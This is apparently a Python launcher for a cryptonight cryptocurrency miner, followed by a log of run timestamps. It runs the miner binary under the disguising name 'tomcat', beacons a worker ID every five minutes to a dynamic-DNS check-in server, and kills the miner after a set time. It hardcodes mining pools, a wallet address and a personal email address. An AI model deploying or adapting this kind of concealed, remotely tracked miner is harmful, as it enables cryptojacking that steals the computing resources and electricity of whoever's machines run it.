import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:21:01.284514
#2018-02-17 17:08:04.243085
#2018-02-17 18:56:02.212421
#2018-02-17 20:36:07.220033
#2018-02-17 22:23:06.727582
#2018-02-18 00:07:01.692895
#2018-02-18 01:58:06.603810
#2018-02-18 03:47:05.936035
#2018-02-18 05:35:06.687592
#2018-02-18 07:29:02.013553
#2018-02-18 09:16:07.484745
#2018-02-18 11:02:03.903386
#2018-02-18 12:48:05.188612
#2018-02-18 14:36:05.611978
#2018-02-18 16:25:07.117450
#2018-02-18 18:15:05.930762
#2018-02-18 20:00:10.213711
#2018-02-18 21:46:06.235907
#2018-02-18 23:36:01.738411
#2018-02-19 01:21:06.932334
#2018-02-19 03:09:05.731133
#2018-02-19 04:54:06.229815
#2018-02-19 06:38:06.926798
#2018-02-19 08:28:04.665938
#2018-02-19 10:17:04.323293
#2018-02-19 12:05:02.235127
#2018-02-19 13:52:10.715593
#2018-02-19 15:41:04.744142
#2018-02-19 17:29:02.100020
#2018-02-19 19:17:02.088113
#2018-02-19 21:04:04.451733
#2018-02-19 22:52:04.219086
#2018-02-20 00:37:02.220809
#2018-02-20 02:25:07.820928
#2018-02-20 04:16:02.029098
#2018-02-20 05:58:05.836237
#2018-02-20 07:44:08.153018
#2018-02-20 09:29:01.935289
#2018-02-20 11:13:05.894816
#2018-02-20 13:01:04.008169
#2018-02-20 14:45:05.974693
#2018-02-20 16:31:04.748050
#2018-02-20 18:18:08.731762
#2018-02-20 20:10:02.154617
#2018-02-20 21:57:01.560277
#2018-02-20 23:39:06.159103
#2018-02-21 01:25:07.202174
#2018-02-21 03:14:08.266791
#2018-02-21 05:02:06.427428
#2018-02-21 06:50:08.662689
#2018-02-21 08:38:01.574874
#2018-02-21 10:23:07.547836
#2018-02-21 12:12:13.108402
#2018-02-21 14:01:08.710706
#2018-02-21 15:45:07.957383
#2018-02-21 17:37:09.427396
#2018-02-21 19:23:01.883042
#2018-02-21 21:13:01.268757
#2018-02-21 22:59:05.638111
#2018-02-22 00:47:01.287415
#2018-02-22 02:36:05.319736
#2018-02-22 04:22:01.404649
#2018-02-22 06:07:05.507851
#2018-02-22 07:53:03.539605
#2018-02-22 09:41:07.019147
#2018-02-22 11:26:05.660912
#2018-02-22 13:13:05.409938
#2018-02-22 15:03:08.297290
#2018-02-22 16:46:06.942439
#2018-02-22 18:33:08.580864
#2018-02-22 20:26:04.364331
#2018-02-22 22:12:01.355004
#2018-02-22 23:58:06.326343
#2018-02-23 01:48:05.701989
#2018-02-23 03:36:06.856182
#2018-02-23 05:20:06.996765
#2018-02-23 07:05:07.516871
#2018-02-23 08:53:07.218390
#2018-02-23 11:13:06.968750
#2018-02-23 13:08:04.174934
#2018-02-23 14:54:01.352370
#2018-02-23 16:42:09.659177
#2018-02-23 18:29:07.806383
#2018-02-23 20:16:04.761144
#2018-02-23 22:06:05.443013
#2018-02-23 23:54:04.359629
#2018-02-24 01:44:02.189611
#2018-02-24 03:36:04.417942
#2018-02-24 05:21:04.110094
#2018-02-24 07:09:06.866956
#2018-02-24 08:56:01.646076
#2018-02-24 10:56:01.363301
#2018-02-24 12:44:07.803495
#2018-02-24 14:34:04.314132
#2018-02-24 16:20:04.198201
#2018-02-24 18:14:05.912952
#2018-02-24 19:59:06.301068
#2018-02-24 21:42:07.382916
#2018-02-25 00:37:03.545829
#2018-02-25 03:33:05.369259
#2018-02-25 07:22:01.193873